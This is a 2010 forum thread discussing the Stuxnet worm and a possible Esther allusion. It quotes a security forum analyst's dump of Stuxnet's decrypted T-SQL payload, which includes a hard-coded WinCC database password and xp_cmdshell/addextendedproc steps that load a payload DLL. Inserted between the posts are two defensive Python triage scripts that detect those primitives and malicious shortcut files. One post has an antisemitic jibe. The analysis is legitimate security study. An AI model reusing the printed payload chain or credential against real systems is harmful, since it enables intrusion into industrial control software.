Free Republic
General/Chat


In a Computer Worm, a Possible Biblical Clue
nytimes ^ | 9/29 | By JOHN MARKOFF and DAVID E. SANGER

Posted on 09/30/2010 11:59:40 AM PDT by JoeProBono

Deep inside the computer worm that some specialists suspect is aimed at slowing Iran’s race for a nuclear weapon lies what could be a fleeting reference to the Book of Esther, the Old Testament tale in which the Jews pre-empt a Persian plot to destroy them. That use of the word “Myrtus” — which can be read as an allusion to Esther — to name a file inside the code is one of several murky clues that have emerged as computer experts try to trace the origin and purpose of the rogue Stuxnet program, which seeks out a specific kind of command module for industrial equipment.

Not surprisingly, the Israelis are not saying whether Stuxnet has any connection to the secretive cyberwar unit it has built inside Israel’s intelligence service. Nor is the Obama administration,

(Excerpt) Read more at nytimes.com ...


TOPICS: Chit/Chat; Computers/Internet; Conspiracy
KEYWORDS: 05091979; esther; habibelghanian; iran; israel; malware; myrtus; stuxnet; virus
"According to Esther 2:7, Esther was originally named Hadassah. Hadassah means "myrtle" in Hebrew. It has been conjectured that the name Esther is derived from a reconstructed Median word astra meaning myrtle"

Ooo -Kay

1 posted on 09/30/2010 11:59:43 AM PDT by JoeProBono

To: JoeProBono
After the Nuremberg trials, as Julius Streicher was about to be hanged, he screamed out "Purimfest 1946!"

Also an allusion to the story of Esther.

People who try to wipe out the Jews do not fare well.

2 posted on 09/30/2010 12:04:57 PM PDT by ClearCase_guy (Things will change after the revolution, but not before.)

To: JoeProBono

Not your fault, but this is like the fourth time today this thread has been started. Just so ya know.

People working overtime to blame Israel, eh?


3 posted on 09/30/2010 12:05:28 PM PDT by Blueflag (Res ipsa loquitur)

To: JoeProBono

One of God’s angels is a Hacker?


4 posted on 09/30/2010 12:09:40 PM PDT by NavyCanDo

To: Blueflag

Blame? Praise is a more appropriate word.


5 posted on 09/30/2010 12:10:38 PM PDT by arthurus (Read Hazlitt's "Economics In One Lesson.")

To: JoeProBono
the Israelis are not saying whether Stuxnet has any connection to the secretive cyberwar unit it has built inside Israel’s intelligence service. Nor is the Obama administration,

You can be sure that if Osama Obama thought that Israel had anything to do with it he would be in a total uproar.
6 posted on 09/30/2010 12:13:16 PM PDT by rideharddiefast

To: ClearCase_guy

7 posted on 09/30/2010 12:19:42 PM PDT by JoeProBono (A closed mouth gathers no feet - Visualize)

To: arthurus

Exactly.


8 posted on 09/30/2010 12:30:36 PM PDT by Eagles6

To: ClearCase_guy

The day of Purim that is celebrated on the Jewish calendar was the day Haman and his 10 sons were hanged. It just so happens that on the same day in 1946 Hitler’s 10 closest officers were hanged after the Nuremberg trials had concluded.


9 posted on 09/30/2010 12:39:09 PM PDT by Jack Hydrazine (It's the end of the world as we know it and I feel fine!)

To: JoeProBono

I thought they had established that the only folks with access to the affected computers were Russian.

India and Indonesia were affected by this worm as well, btw.


10 posted on 09/30/2010 12:55:00 PM PDT by Schnucki

To: Blueflag; JoeProBono; ShadowAce; blam; SunkenCiv; Marine_Uncle
Could be other than Israel... at Wired:

SCADA System’s Hard-Coded Password Circulated Online for Years

And let's include something from Wilders Security Forum: Rootkit.TmpHider

**************************************Excerpts************************************

July 12th, 2010, 09:18 AM

sergey ulasen

Modules of the current malware were first detected by "VirusBlokAda" (http://anti-virus.by/en/) company specialists on the 17th of June, 2010 and were added to the anti-virus bases as Trojan-Spy.0485 and Malware-Cryptor.Win32.Inject.gen.2. During the analysis of the malware it was revealed that it uses USB storage devices for propagation.

You should take into consideration that the virus infects the operating system in an unusual way, through a vulnerability in the processing of lnk-files (without usage of an autorun.inf file).

So you just have to open an infected USB storage device using Microsoft Explorer or any other file manager which can display icons (e.g. Total Commander) to infect your operating system and allow execution of the malware.

The malware installs two drivers: mrxnet.sys and mrxcls.sys. They are used to inject code into system processes and to hide the malware itself. That's the reason why you can't see the malware files on the infected USB storage device. We have added those drivers to the anti-virus bases as Rootkit.TmpHider and SScope.Rookit.TmpHider.2. Note that both drivers are signed with the digital signature of Realtek Semiconductor Corp. (www.realtek.com).

Thus, the current malware should be added to the very dangerous category, as it poses the risk of a virus epidemic at the current moment.

After we added the new records to the anti-virus bases we are seeing a lot of detections of Rootkit.TmpHider and SScope.Rookit.TmpHider.2 all over the world.



Source: http://anti-virus.by/en/tempo.shtml

__________________

**************************************************************snip************************************************

Now to a later post :

frank_boldewin

AV Expert

***************************EXCERPT*****************************

Hi guys,

Has anyone already taken a deeper look at the malware?

I found stuff like this after some decryption/unpacking stages of MD5 sample 016169ebebf1cec2aad6c7f0d0ee9026

**********************

SOFTWARE\Microsoft\MSSQLServer pdl GracS\ 2WSXcder WinCCConnect master .\WinCC sqloledb GracS\cc_tlg7.sav Step7\Example use [%s] declare @t varchar(4000), @e int, @f int if exists (select text from dbo.syscomments where id=object_id(N'[dbo].[MCPVREADVARPERCON]')) select @t=rtrim(text) from dbo.syscomments c, dbo.sysobjects o where o.id = c.id and c.id = object_id(N'[dbo].[MCPVREADVARPERCON]') set @e=charindex(',openrowset',@t) if @e=0 set @t=right(@t,len(@t)-7) else begin set @f=charindex('sp_msforeachdb',@t) if @f=0 begin set @t=left(@t,@e-1) set @t=right(@t,len(@t)-7) end else select * from fail_in_order_to_return_false end set @t='alter '+@t+',openrowset(''SQLOLEDB'',''Server=.\WinCC;uid=WinCCConnect;pwd=2WSXcder'',''select 0;set IMPLICIT_TRANSACTIONS off;declare @z nvarchar(999);set @z=''''use [?];declare @t nvarchar(2000);declare @s nvarchar(9);set @s=''''''''--CC-S''''''''+char(80);if left(db_name(),2)=''''''''CC'''''''' select @t=substring(text,charindex(@s,text)+8,charindex(''''''''--*'''''''',text)-charindex(@s,text)-8) from syscomments where text like (''''''''%''''''''+@s+''''''''%'''''''');if @t is not NULL exec(@t)'''';exec sp_msforeachdb @z'')' exec (@t) declare @t varchar(4000), @e int, @f int if exists (select * from dbo.syscomments where id=object_id(N'[dbo].[MCPVPROJECT2]')) select @t=rtrim(c.text) from dbo.syscomments c, dbo.sysobjects o where o.id = c.id and c.id = object_id(N'[dbo].[MCPVPROJECT2]') order by c.number, c.colid set @e=charindex('--CC-SP',@t) if @e=0 begin set @f=charindex('where',@t) if @f<>0 set @t=left(@t,@f-1) set @t=right(@t,len(@t)-6) end else select * from fail_in_order_to_return_false set @t='alter '+@t+' where ((SELECT top 1 1 FROM MCPVREADVARPERCON)=''1'') --CC-SP use master;declare @t varchar(999),@s varchar(999),@a int declare r cursor for select filename from master..sysdatabases where (name like ''CC%'') open r fetch next from r into @t while (@@fetch_status<>-1) begin set 
@t=left(@t,len(@t)-charindex(''\'',reverse(@t)))+''\GraCS\cc_tlg7.sav'';exec master..xp_fileexist @t,@a out;if @a=1 begin set @s = ''master..xp_cmdshell ''''extrac32 /y "''+@t+''" "''+@t+''x"'''''';exec(@s);set @t = @t+''x'';dbcc addextendedproc(sp_payload,@t);exec master..sp_payload;exec master..sp_dropextendedproc sp_payload;break; end fetch next from r into @t end close r deallocate r --*' exec (@t) use master select name from master..sysdatabases where filename like N'%s' exec master..sp_attach_db 'wincc_svr',N'%s',N'%s' exec master..sp_detach_db 'wincc_svr' use wincc_svr or SOFTWARE\SIEMENS\WinCC\Setup STEP7_Version SOFTWARE\SIEMENS\STEP7 SOFTWARE\Microsoft\Windows\CurrentVersion\MS-DOS Emulation NTVDM TRACE .MCP .zip ~DT %s\WINCC DECLARE @vr varchar(256) SET @vr = CONVERT(varchar(256), (SELECT serverproperty('productversion') )) IF @vr > '9' BEGIN EXEC sp_configure 'show advanced options', 1 RECONFIGURE WITH OVERRIDE EXEC sp_configure 'Ole Automation Procedures', 1 RECONFIGURE WITH OVERRIDE END DECLARE @ashl int, @aind varchar(260), @ainf varchar(260), @hr int EXEC @hr = sp_OACreate 'WScript.Shell', @ashl OUT IF @hr <> 0 GOTO endq EXEC sp_OAMethod @ashl, 'ExpandEnvironmentStrings', @aind OUT, '%%ALLUSERSPROFILE%%' SET @ainf = @aind + '\sql%05x.dbi' DECLARE @aods int, @adss int, @aip int, @abf varbinary(4096) EXEC @hr = sp_OACreate 'ADODB.Stream', @aods OUT IF @hr <> 0 GOTO endq EXEC @hr = sp_OASetProperty @aods, 'Type', 1 IF @hr <> 0 GOTO endq EXEC @hr = sp_OAMethod @aods, 'Open', null IF @hr <> 0 GOTO endq SET @adss = ( SELECT DATALENGTH(abin) FROM sysbinlog ) SET @aip = 1 WHILE ( @aip <= @adss ) BEGIN SET @abf = ( SELECT SUBSTRING (abin, @aip, 4096 ) FROM sysbinlog ) EXEC @hr = sp_OAMethod @aods, 'Write', null, @abf IF @hr <> 0 GOTO endq SET @aip = @aip + 4096 END EXEC @hr = sp_OAMethod @aods, 'SaveToFile', null, @ainf, 2 IF @hr <> 0 GOTO endq EXEC sp_OAMethod @aods, 'Close', null endq: EXEC sp_dropextendedproc sp_dumpdbilog DECLARE @ashl int, @aind 
varchar(260), @ainf varchar(260), @hr int EXEC @hr = sp_OACreate 'WScript.Shell', @ashl OUT IF @hr <> 0 GOTO endq EXEC sp_OAMethod @ashl, 'ExpandEnvironmentStrings', @aind OUT, '%%ALLUSERSPROFILE%%' SET @ainf = @aind + '\sql%05x.dbi' EXEC sp_addextendedproc sp_dumpdbilog, @ainf EXEC sp_dumpdbilog EXEC sp_dropextendedproc sp_dumpdbilog endq: DECLARE @ashl int, @aind varchar(260), @ainf varchar(260), @hr int EXEC @hr = sp_OACreate 'WScript.Shell', @ashl OUT IF @hr <> 0 GOTO endq EXEC sp_OAMethod @ashl, 'ExpandEnvironmentStrings', @aind OUT, '%%ALLUSERSPROFILE%%' SET @ainf = @aind + '\sql%05x.dbi' DECLARE @fs int EXEC @hr = sp_OACreate 'Scripting.FileSystemObject', @fs OUT IF @hr <> 0 GOTO endq EXECUTE sp_OAMethod @fs, 'DeleteFile', NULL, @ainf endq: DROP TABLE sysbinlog 0123456789ABCDEF CREATE TABLE sysbinlog ( abin image ) INSERT INTO sysbinlog VALUES(0x %SystemRoot%\system32\netapi32.dll %SystemRoot%\system32\kernel32.dll .xp_cmdshell ''''extrac32 /y "''+@t+''" "''+@t+''x"'''''';exec(@s);set @t = @t+''x'';dbcc addextendedproc(sp_run,@t);exec master..sp_run;') view MCPVREADVARPERCON as select MCPTVARIABLEDESC.VARIABLEID,MCPTVARIABLEDESC.VARIABLETYPEID,MCPTVARIABLEDESC.FORMATFITTING,MCPTVARIABLEDESC.SCALEID,MCPTVARIABLEDESC.VARIABLENAME,MCPTVARIABLEDESC.ADDRESSPARAMETER,MCPTVARIABLEDESC.PROTOKOLL,MCPTVARIABLEDESC.MAXLIMIT,MCPTVARIABLEDESC.MINLIMIT,MCPTVARIABLEDESC.STARTVALUE,MCPTVARIABLEDESC.SUBSTVALUE,MCPTVARIABLEDESC.VARFLAGS,MCPTVARIABLEDESC.CONNECTIONID,MCPTVARIABLEDESC.VARPROPERTY,MCPTVARIABLEDESC.CYCLETIMEID,MCPTVARIABLEDESC.LASTCHANGE,MCPTVARIABLEDESC.ASDATASIZE,MCPTVARIABLEDESC.OSDATASIZE,MCPTVARIABLEDESC.VARGROUPID,MCPTVARIABLEDESC.VARXRES,MCPTVARIABLEDESC.VARMARK,MCPTVARIABLEDESC.SCALETYPE,MCPTVARIABLEDESC.SCALEPARAM1,MCPTVARIABLEDESC.SCALEPARAM2,MCPTVARIABLEDESC.SCALEPARAM3,MCPTVARIABLEDESC.SCALEPARAM4 from MCPTVARIABLEDESC ((SELECT top 1 1 FROM MCPVREADVARPERCON)='1') --CC-SP 0;set IMPLICIT_TRANSACTIONS off;declare @z nvarchar(999);set @z=''use 
[?];declare @t nvarchar(2000);declare @s nvarchar(9);set @s=''''--CC-S''''+char(80);if left(db_name(),2)=''''CC'''' select @t=substring(text,charindex(@s,text)+8,charindex(''''--*'''',text)-charindex(@s,text)-8) from syscomments where text like (''''%''''+@s+''''%'''');if @t is not NULL exec(@t)'';exec sp_msforeachdb @z')

*****************************************

This points me to the Siemens WinCC SCADA system. Looks like this malware was made for espionage.

11 posted on 09/30/2010 1:12:06 PM PDT by Ernest_at_the_Beach ( Support Geert Wilders)
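The strings dump in the post above shows two things worth pulling out mechanically: the WinCC database login embedded in the openrowset call (the hard-coded password the Wired headline refers to), and the T-SQL primitives the payload chains together (xp_cmdshell to unpack a file, dbcc addextendedproc / sp_addextendedproc to load it into the SQL Server process, Ole Automation plus sp_OACreate to write files from inside the database). The following is an added example, not code from the post or from any of the analysts quoted in it: a small triage script that runs over a constructed excerpt of the dump and reports both. Function names, the indicator table and the Finding type are this example's own.

```python
"""Triage of the T-SQL recovered from the Stuxnet sample (added example).

Scans a strings-style dump for (1) OLE DB connection strings that embed a
password, and (2) the T-SQL primitives the payload chains together to turn a
database login into code execution inside the SQL Server process on the WinCC
host.  The sample text is a constructed excerpt of the dump quoted above; the
function names and indicator table are this example's own.
"""
import re
from dataclasses import dataclass, field

# Constructed excerpt of the strings dump in the post above (quote doubling is
# as it appears in the dump, where the SQL is nested inside string literals).
SAMPLE_STRINGS = r"""
set @t='alter '+@t+',openrowset(''SQLOLEDB'',''Server=.\WinCC;uid=WinCCConnect;pwd=2WSXcder'',''select 0;
set @s = ''master..xp_cmdshell ''''extrac32 /y "''+@t+''" "''+@t+''x"'''''';exec(@s);set @t = @t+''x'';dbcc addextendedproc(sp_payload,@t);exec master..sp_payload;
exec sp_msforeachdb @z
EXEC sp_configure 'show advanced options', 1 RECONFIGURE WITH OVERRIDE EXEC sp_configure 'Ole Automation Procedures', 1 RECONFIGURE WITH OVERRIDE
EXEC @hr = sp_OACreate 'WScript.Shell', @ashl OUT
EXEC sp_addextendedproc sp_dumpdbilog, @ainf EXEC sp_dumpdbilog
"""

# T-SQL primitives worth flagging, with the reason an incident responder cares.
PRIMITIVES = {
    "openrowset":      (r"openrowset\s*\(", "ad hoc remote query with inline credentials"),
    "xp_cmdshell":     (r"\bxp_cmdshell\b", "OS command execution from T-SQL"),
    "addextendedproc": (r"dbcc\s+addextendedproc|sp_addextendedproc",
                        "loads an arbitrary DLL into the SQL Server process"),
    "ole_automation":  (r"sp_configure\s+'Ole Automation Procedures',\s*1",
                        "enables COM automation (file writes via ADODB.Stream)"),
    "sp_oacreate":     (r"\bsp_OACreate\b", "instantiates COM objects such as WScript.Shell"),
    "sp_msforeachdb":  (r"\bsp_msforeachdb\b", "iterates every database (every WinCC project)"),
}
# A connection string runs from Server=/Data Source= to the closing quote.
CONN_RE = re.compile(r"((?:Server|Data Source)=[^'\r\n]+)", re.IGNORECASE)


@dataclass
class Finding:
    credentials: list = field(default_factory=list)  # connection strings carrying a password
    primitives: dict = field(default_factory=dict)   # indicator name -> (hit count, rationale)


def parse_conn_string(s: str) -> dict:
    """Split 'Key=Value;Key=Value' into a dict with lower-cased keys."""
    out = {}
    for pair in s.split(";"):
        if "=" in pair:
            key, value = pair.split("=", 1)
            out[key.strip().lower()] = value.strip()
    return out


def triage(text: str) -> Finding:
    """Collect embedded credentials and dangerous T-SQL primitives from a dump."""
    finding = Finding()
    for match in CONN_RE.finditer(text):
        conn = parse_conn_string(match.group(1))
        if "pwd" in conn or "password" in conn:
            finding.credentials.append(conn)
    for name, (pattern, why) in PRIMITIVES.items():
        hits = len(re.findall(pattern, text, re.IGNORECASE))
        if hits:
            finding.primitives[name] = (hits, why)
    return finding


def has_sql_to_code_exec_chain(finding: Finding) -> bool:
    """A hard-coded login plus any native-execution primitive is the full chain:
    whoever can reach the WinCC SQL instance can run code as it."""
    native_exec = {"xp_cmdshell", "addextendedproc", "ole_automation", "sp_oacreate"}
    return bool(finding.credentials) and bool(native_exec & set(finding.primitives))


if __name__ == "__main__":
    result = triage(SAMPLE_STRINGS)
    for cred in result.credentials:
        print("hard-coded login:", cred)
    for name, (hits, why) in result.primitives.items():
        print(f"{name}: {hits} hit(s) - {why}")
    print("SQL login -> code execution chain present:", has_sql_to_code_exec_chain(result))
```

On a live WinCC host the same signals can be checked from the database side rather than from a strings dump: whether 'xp_cmdshell' and 'Ole Automation Procedures' are enabled in sys.configurations, which extended procedures are registered in master, and whether any view definition carries the '--CC-SP' / '--CC-S' markers the payload uses to stash its own T-SQL inside a project database. The credential finding is the one that cannot be fixed by configuration: the password is the product's, not the operator's, which is why the Wired piece matters.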

To: All
From Rmus Exploit Analyst

http://www.wilderssecurity.com/showpost.php?p=1712713&postcount=26

********************************EXCERPT************************************

Re: Rootkit.TmpHider

Is this vulnerability present in all Windows Operating Systems? I cannot get shortcut links to run automatically from a USB drive in Win2K or WinXP.

12 posted on 09/30/2010 1:25:37 PM PDT by Ernest_at_the_Beach ( Support Geert Wilders)

To: All
And :

i_g Regular Poster

******************************EXCERPT*****************************

Re: Rootkit.TmpHider


Quote:
Originally Posted by Rmus
Is this vulnerability present in all Windows Operating Systems? I cannot get shortcut links to run automatically from a USB drive in Win2K or WinXP.

Yes, it is.
Well, didn't try on Win2k, but it works on XP, Vista, Win7.

13 posted on 09/30/2010 1:29:07 PM PDT by Ernest_at_the_Beach ( Support Geert Wilders)

To: Jack Hydrazine

Thank you for that historical tidbit. Ironic. May the same fate befall anyone else who seeks to annihilate the Jews or commit any sort of genocide.


14 posted on 09/30/2010 1:30:09 PM PDT by Bigg Red (Palin/Hunter 2012 -- Bolton their Secretary of State)

To: JoeProBono; Blueflag

NY Times has a vested interest in blaming the Joooos....


15 posted on 09/30/2010 1:35:15 PM PDT by Ernest_at_the_Beach ( Support Geert Wilders)

To: Jack Hydrazine
...It just so happens that on the same day in 1946 Hitler’s 10 closest officers were hanged...

LOL

16 posted on 09/30/2010 1:45:03 PM PDT by Talisker (When you find a turtle on top of a fence post, you can be damn sure it didn't get there on it's own.)

To: Ernest_at_the_Beach
More on the Root Kit :

RootkitTmpHider-USB-infector-without-usage-of-Autoruninf

17 posted on 09/30/2010 1:46:57 PM PDT by Ernest_at_the_Beach ( Support Geert Wilders)

EXCERPT From #17:

********************************EXCERPT*************************************

Rootkit-TmpHider - USB infector without usage of Autorun.inf

»anti-virus.by/en/tempo.shtml

Also they are talking about this at Wilders in some depth.

»www.wilderssecurity.com/showthre···t=276994

This malware appears to be exploiting an unpatched vulnerability in processing LNK files.

It looks like this malware could infect even if you have 'Autorun' disabled on your computer. Simply accessing the infected USB device with Windows Explorer or another file manager could execute this malware.

18 posted on 09/30/2010 1:49:13 PM PDT by Ernest_at_the_Beach ( Support Geert Wilders)
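Posts 12, 13 and 18 circle the same point: the shortcut files do their damage when Explorer renders their icons, so disabling Autorun does nothing. Microsoft later patched the bug as MS10-046 (CVE-2010-2568); the shortcut's target item list names a library, and Explorer loads that library to draw the icon. The following is an added example, not code from the posts or from the analysts quoted in them: a minimal .lnk parser that reads the fixed ShellLinkHeader and the LinkTargetIDList and flags shortcuts whose target list names a .dll or .cpl. The .lnk bytes it runs on are constructed by build_lnk, the three item-header bytes in path_item are placeholders, and the paths E:\icon_provider.dll and C:\Users\Public\notes.txt are invented for the example.

```python
"""Shell Link (.lnk) triage for the icon-rendering bug described above (added example).

Parses the fixed 76-byte ShellLinkHeader and the LinkTargetIDList of a .lnk
and flags shortcuts whose target item list names a library (.dll/.cpl):
Explorer loads such a library to draw the shortcut's icon, so merely listing
the folder runs the code, autorun.inf or not.  The .lnk bytes used here are
constructed (build_lnk); real shortcuts carry more item types than these.
"""
import struct

SHELL_LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")    # {00021401-0000-0000-C000-000000000046}
CONTROL_PANEL_CLSID = bytes.fromhex("2020ec21ea3a6910a2dd08002b30309d")  # {21EC2020-3AEA-1069-A2DD-08002B30309D}
HAS_LINK_TARGET_ID_LIST = 0x00000001
HEADER_SIZE = 0x4C
LIBRARY_EXTS = (".dll", ".cpl")


def parse_lnk(data: bytes) -> dict:
    """Return the LinkFlags and the raw ItemID blobs of the LinkTargetIDList."""
    if (len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE
            or data[4:20] != SHELL_LINK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    items = []
    if flags & HAS_LINK_TARGET_ID_LIST:
        idlist_size = struct.unpack_from("<H", data, HEADER_SIZE)[0]
        idlist = data[HEADER_SIZE + 2:HEADER_SIZE + 2 + idlist_size]
        off = 0
        while off + 2 <= len(idlist):
            item_size = struct.unpack_from("<H", idlist, off)[0]  # includes its own 2 bytes
            if item_size < 2:  # 0x0000 is the TerminalID
                break
            items.append(idlist[off + 2:off + item_size])
            off += item_size
    return {"flags": flags, "items": items}


def utf16_strings(blob: bytes, min_len: int = 4) -> list:
    """Printable UTF-16LE runs, scanned at both byte alignments because item
    headers are not always an even number of bytes."""
    found = []
    for start in (0, 1):
        run = []
        for i in range(start, len(blob) - 1, 2):
            ch = blob[i] | (blob[i + 1] << 8)
            if 0x20 <= ch < 0x7F:
                run.append(chr(ch))
            else:
                if len(run) >= min_len:
                    found.append("".join(run))
                run = []
        if len(run) >= min_len:
            found.append("".join(run))
    return found


def assess(parsed: dict) -> dict:
    """Heuristic verdict: a path-like target ending in a library extension, or a
    Control Panel folder item combined with any file path, is suspicious."""
    strings = [s for item in parsed["items"] for s in utf16_strings(item)]
    paths = [s for s in strings if "\\" in s]
    library_targets = [p for p in paths if p.lower().endswith(LIBRARY_EXTS)]
    control_panel = any(CONTROL_PANEL_CLSID in item for item in parsed["items"])
    return {
        "paths": paths,
        "library_targets": library_targets,
        "control_panel_folder": control_panel,
        "suspicious": bool(library_targets) or (control_panel and bool(paths)),
    }


def triage_lnk(data: bytes) -> dict:
    return assess(parse_lnk(data))


def build_lnk(items: list) -> bytes:
    """Construct a minimal .lnk: header with HasLinkTargetIDList set, then the
    IDList (each ItemID is a 2-byte size followed by its data) and TerminalID."""
    header = struct.pack("<I16sIIqqqIIIHHII", HEADER_SIZE, SHELL_LINK_CLSID,
                         HAS_LINK_TARGET_ID_LIST, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    idlist = b"".join(struct.pack("<H", len(d) + 2) + d for d in items) + b"\x00\x00"
    return header + struct.pack("<H", len(idlist)) + idlist


def path_item(path: str) -> bytes:
    # Three placeholder header bytes (constructed), then the path as UTF-16LE.
    return b"\x70\x00\x01" + path.encode("utf-16-le") + b"\x00\x00"


# Constructed samples: a shortcut routed through the Control Panel folder to a
# DLL on a removable drive, and an ordinary shortcut to a text file.
SUSPICIOUS_LNK = build_lnk([b"\x1f" + CONTROL_PANEL_CLSID, path_item(r"E:\icon_provider.dll")])
BENIGN_LNK = build_lnk([path_item(r"C:\Users\Public\notes.txt")])

if __name__ == "__main__":
    for label, blob in (("suspicious", SUSPICIOUS_LNK), ("benign", BENIGN_LNK)):
        print(label, triage_lnk(blob))
```

Two caveats follow from the posts themselves. The extension match is one signal, not a verdict: a library can carry any file name, and a legitimate Control Panel shortcut can also point at a .cpl. And because the mrxnet.sys driver hides the malicious files from the infected host, a stick should be imaged or scanned from a clean system; on a compromised Windows box the shortcuts this script is looking for may simply not be listed.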

To: Talisker

What’s so funny? I must be missing something in the text you put in bold.


19 posted on 09/30/2010 2:36:01 PM PDT by Jack Hydrazine (It's the end of the world as we know it and I feel fine!)

To: Ernest_at_the_Beach; blam; Perdogg; martin_fierro; Swordmaker; Quix
use of the word "Myrtus" -- which can be read as an allusion to Esther -- to name a file inside the code is one of several murky clues
Turn me on, dead man. ;')


20 posted on 09/30/2010 6:31:24 PM PDT by SunkenCiv (Democratic Underground... matters are worse, as their latest fund drive has come up short...)

